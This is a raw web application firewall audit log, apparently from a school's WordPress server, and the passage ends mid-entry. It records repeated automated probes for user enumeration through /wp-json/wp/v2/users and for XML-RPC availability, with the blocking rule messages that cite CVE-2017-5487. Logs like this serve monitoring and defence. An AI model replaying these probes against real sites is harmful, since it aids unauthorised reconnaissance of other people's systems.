ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676842042925 4802 (- - -) Stopwatch2: 1746676842042925 4802; combined=3759, p1=471, p2=3072, p3=32, p4=25, p5=94, sr=68, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad60e62-Z-- --c9c08e27-A-- [08/May/2025:11:00:51 +0700] aBwsc8P9GxxPAbCroFbNCQAAAEY 103.236.140.4 43766 103.236.140.4 8181 --c9c08e27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c9c08e27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9c08e27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676851149517 3207 (- - -) Stopwatch2: 1746676851149517 3207; combined=1309, p1=459, p2=819, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9c08e27-Z-- --3f800b2b-A-- [08/May/2025:11:00:53 +0700] aBwsdcP9GxxPAbCroFbNCwAAAFc 103.236.140.4 43770 103.236.140.4 8181 --3f800b2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.140 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f800b2b-C-- demo.sayHello --3f800b2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f800b2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676853805330 6795 (- - -) Stopwatch2: 1746676853805330 6795; combined=4824, p1=610, p2=3957, p3=38, p4=43, p5=103, sr=80, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f800b2b-Z-- --845a4864-A-- [08/May/2025:11:00:57 +0700] aBwseY4K347NtBcwXKwGVwAAAIg 103.236.140.4 43776 103.236.140.4 8181 --845a4864-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --845a4864-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --845a4864-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676857060333 2170 (- - -) Stopwatch2: 1746676857060333 2170; combined=952, p1=335, p2=590, p3=0, p4=0, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --845a4864-Z-- --b002647b-A-- [08/May/2025:11:01:01 +0700] aBwsfcP9GxxPAbCroFbNDwAAAFg 103.236.140.4 43780 103.236.140.4 8181 --b002647b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b002647b-C-- demo.sayHello --b002647b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b002647b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676861139236 4535 (- - -) Stopwatch2: 1746676861139236 4535; combined=3492, p1=425, p2=2870, p3=22, p4=24, p5=89, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b002647b-Z-- --1e073657-A-- [08/May/2025:11:01:12 +0700] aBwsiKcs1DvJ_HgMHE_yIwAAABE 103.236.140.4 43784 103.236.140.4 8181 --1e073657-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1e073657-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e073657-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676872425913 2678 (- - -) Stopwatch2: 1746676872425913 2678; combined=1206, p1=431, p2=744, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e073657-Z-- --bda22023-A-- [08/May/2025:11:01:21 +0700] aBwskacs1DvJ_HgMHE_yJAAAAAQ 103.236.140.4 43786 103.236.140.4 8181 --bda22023-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bda22023-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bda22023-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676881427992 3337 (- - -) Stopwatch2: 1746676881427992 3337; combined=1463, p1=511, p2=918, p3=0, p4=0, p5=34, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bda22023-Z-- --3b6a9d06-A-- [08/May/2025:11:01:23 +0700] aBwsk6cs1DvJ_HgMHE_yJgAAABg 103.236.140.4 43790 103.236.140.4 8181 --3b6a9d06-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b6a9d06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b6a9d06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676883578707 3110 (- - -) Stopwatch2: 1746676883578707 3110; combined=1300, p1=445, p2=825, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b6a9d06-Z-- --46beeb64-A-- [08/May/2025:11:01:25 +0700] aBwslcP9GxxPAbCroFbNEAAAAFQ 103.236.140.4 43792 103.236.140.4 8181 --46beeb64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.139 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --46beeb64-C-- demo.sayHello --46beeb64-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --46beeb64-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676885040984 5441 (- - -) Stopwatch2: 1746676885040984 5441; combined=4128, p1=472, p2=3430, p3=31, p4=34, p5=93, sr=67, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46beeb64-Z-- --b6957570-A-- [08/May/2025:11:01:26 +0700] aBwslqcs1DvJ_HgMHE_yKAAAAAU 103.236.140.4 43798 103.236.140.4 8181 --b6957570-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b6957570-C-- demo.sayHello --b6957570-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6957570-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676886789010 4170 (- - -) Stopwatch2: 1746676886789010 4170; combined=3186, p1=393, p2=2615, p3=19, p4=21, p5=80, sr=58, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6957570-Z-- --40c9a942-A-- [08/May/2025:11:01:41 +0700] aBwspacs1DvJ_HgMHE_yKgAAAAM 103.236.140.4 43802 103.236.140.4 8181 --40c9a942-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40c9a942-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40c9a942-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676901129947 3526 (- - -) Stopwatch2: 1746676901129947 3526; combined=1522, p1=499, p2=986, p3=0, p4=0, p5=36, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40c9a942-Z-- --03ecf206-A-- [08/May/2025:11:01:45 +0700] aBwsqcP9GxxPAbCroFbNEwAAAEM 103.236.140.4 43806 103.236.140.4 8181 --03ecf206-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --03ecf206-C-- demo.sayHello --03ecf206-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --03ecf206-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676905129973 6262 (- - -) Stopwatch2: 1746676905129973 6262; combined=4592, p1=598, p2=3767, p3=34, p4=37, p5=93, sr=99, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03ecf206-Z-- --0550c94d-A-- [08/May/2025:11:02:02 +0700] aBwsuqcs1DvJ_HgMHE_yLAAAAAo 103.236.140.4 43812 103.236.140.4 8181 --0550c94d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0550c94d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0550c94d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676922125130 3229 (- - -) Stopwatch2: 1746676922125130 3229; combined=1421, p1=476, p2=911, p3=0, p4=0, p5=33, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0550c94d-Z-- --4005f008-A-- [08/May/2025:11:02:03 +0700] aBwsu6cs1DvJ_HgMHE_yLQAAAA0 103.236.140.4 43814 103.236.140.4 8181 --4005f008-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4005f008-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4005f008-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676923517437 2007 (- - -) Stopwatch2: 1746676923517437 2007; combined=822, p1=280, p2=518, p3=0, p4=0, p5=23, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4005f008-Z-- --d42ac21a-A-- [08/May/2025:11:02:05 +0700] aBwsvY4K347NtBcwXKwGWAAAAIM 103.236.140.4 43820 103.236.140.4 8181 --d42ac21a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d42ac21a-C-- demo.sayHello --d42ac21a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d42ac21a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676925994580 4826 (- - -) Stopwatch2: 1746676925994580 4826; combined=3749, p1=453, p2=3090, p3=25, p4=25, p5=91, sr=67, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d42ac21a-Z-- --c7c51245-A-- [08/May/2025:11:02:06 +0700] aBwsvqcs1DvJ_HgMHE_yLgAAAAs 103.236.140.4 43822 103.236.140.4 8181 --c7c51245-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c7c51245-C-- demo.sayHello --c7c51245-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7c51245-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676926758836 5364 (- - -) Stopwatch2: 1746676926758836 5364; combined=4026, p1=514, p2=3301, p3=29, p4=31, p5=89, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7c51245-Z-- --b33b1661-A-- [08/May/2025:11:02:19 +0700] aBwsy6cs1DvJ_HgMHE_yMAAAABA 103.236.140.4 43832 103.236.140.4 8181 --b33b1661-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b33b1661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b33b1661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676939889118 2862 (- - -) Stopwatch2: 1746676939889118 2862; combined=1260, p1=451, p2=779, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b33b1661-Z-- --7a6eed08-A-- [08/May/2025:11:02:23 +0700] aBwsz8P9GxxPAbCroFbNGQAAAEw 103.236.140.4 43836 103.236.140.4 8181 --7a6eed08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7a6eed08-C-- demo.sayHello --7a6eed08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a6eed08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file 